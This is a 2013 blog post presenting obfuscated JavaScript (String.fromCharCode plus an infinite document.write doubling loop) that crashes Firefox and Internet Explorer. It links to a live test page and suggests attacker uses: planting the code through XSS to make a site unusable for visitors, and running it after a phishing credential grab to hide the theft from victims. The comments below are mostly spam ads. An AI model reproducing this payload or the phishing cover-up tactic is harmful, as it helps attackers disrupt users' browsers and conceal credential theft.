Pages

Monday, 2 December 2013

DOS - Mozilla Firefox & Internet Explorer

Since some time ( I saw it at least a year ago ) there is available javascript code that cause DOS in newest versions of FF and IE. Unfortunately it doesn't work in Chrome, because each card has own process. I don't know what about Chrome or Opera, You can test it and let me know in comments. It was already reported to Mozilla long time ago ( I reported too ) but it seems they are not going to fix it.

Javascript code:
var a=String.fromCharCode(60,115,99,114,105,112,116,62,118,97,114,32,97,61,34,60,109 ,97,114,113,117,101,101,62,97,34,59,119,104,105,108,101,40,49,41,123,97,61,97,43 ,97,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,97,41,59,125,60, 47,115,99,114,105,112,116,62);
while(1){
a=a+a;
document.write(a);}

For test how and if it works:
WARNING, IT WILL CRASH YOUR BROWSER, OPEN ON OWN RESPONSIBILITY
https://dl.dropboxusercontent.com/u/17580849/freez.html

How it can be useful
You can say its useless and good just for making friends angry,
not only...

1. An attacker may add this code to website, so everyone who visit it will get crash, it will make website unreachable. Probably now you think - if attacker has access to website he can just delete main page or do something simpler than crashing visitors browsers. Yes, but javascript can be used in XSS attack and then its useful.

2. Attacker can also add it after phishing attack, after password getting step. Thanks to this attacker don't have to worry to show correct messages and redirection. Whats more after running that he can add ip/browser rule, so when victim visit phishing link again, will be redirected to real page. After one crash none will think something is wrong (in ff flash plugin often crash itself) and when he visit page second time, this time there will be nothing suspicious.

3. As everywhere in IT, the only limit is imagination.

At the end, Mozilla respond:



19 comments:

  1. Na Chrome exploit nie zawiesza przeglądarki, może dlatego że każda karta to oddzielny proces który można bez problemu skillować.

    ReplyDelete
  2. Interestingly, a firewall program pays special mind to possibly malignant associations from being made to your portable PC or PC without your consent. It screens the focuses (called ports) where such associations are made.http://how-to-remove.org/malware/browser-hijacker-removal/easyopenweb-com-removal/

    ReplyDelete
  3. Could the Internet as we know it today become a controlled network operated by governments and multinational corporations? With multimedia piracy and social networking becoming uncontrollable, the internet as we know it could face an uncertain future.http://www.assignmentsynonym.eu/

    ReplyDelete
  4. The large US carriers ultimately had control of the networks, and were the original Tier 1 Internet providers.Chrome Browser Using too much computer ram

    ReplyDelete
  5. If so, then you are on your to certification.ann arbor seo

    ReplyDelete
  6. This is such a great resource that you are providing and you give it away for free. Maharashtra Ration Card Application

    ReplyDelete
  7. According to Wikipedia, an IXP is a physical infrastructure that allows different Internet Service Providers to exchange Internet traffic between their networks (autonomous systems) by means of mutual peering agreements, which allows traffic to be exchanged without cost. find my ip address

    ReplyDelete
  8. Features and bells and whistles are great but if it affects your computer's performance it is going to slow productivity.https://iturbu.com

    ReplyDelete
  9. For those of you for whom this is not enough, Perfect Privacy has introduced a NeuroRouting so you can use the VPN network to route your traffic dynamically. And all of these features are available server-side which means that they are active from the moment you turn your SumoWhale VPN on.

    ReplyDelete
  10. This option did a fantastic job, however we will see just how excellent after the heavy rain period! They're not cheap, however the high quality appears to be good, plus they cleared up nicely. I combined the roof work with a paint job subcontracted by Shelton Roofing to another service provider. Roofing work had been great; no discuss the splash of paint. Shelton Roofing came out as planned, on time check out the post right here.

    ReplyDelete
  11. Hi to everybody, here everyone is sharing such knowledge, so it’s fastidious to see this site, and I used to visit this blog daily.a3 snap frames

    ReplyDelete
  12. Now I have the best idea to how to deal problems! Thanks to them!double glazing company

    ReplyDelete
  13. Your website is terribly informative and your articles are wonderful.Home Owner's Pal

    ReplyDelete
  14. It was very useful to be the part of them and by reading their mentioned guidance! You should also take a survey at this site it is great and will be very helpful! http://www.organicdailypost.com

    ReplyDelete
  15. This implies the internet can enable advertisers to interface with their objective customers so cash can be traded for the pleasure in particular items and administrations that fulfill human needs. clear history

    ReplyDelete
  16. There is noticeably a lot of money to understand about this. I assume you made certain nice points in features also. borrar todo

    ReplyDelete
  17. Welcome to the Best writer Review, Here you can get the best All Assignment Help reviews sites. We strongly urge you to check our entire website once and we will assure you will find this review website very useful. Our hard work will be rewarded if students like you will appreciate our effort and spread the message about this site with your class-fellows and friends.

    ReplyDelete
  18. The article posted was very informative and useful. You people are doing a great job. Keep going. identity management

    ReplyDelete
  19. You need to check out this post for some info on how to write extended essay. This could really help you in the future

    ReplyDelete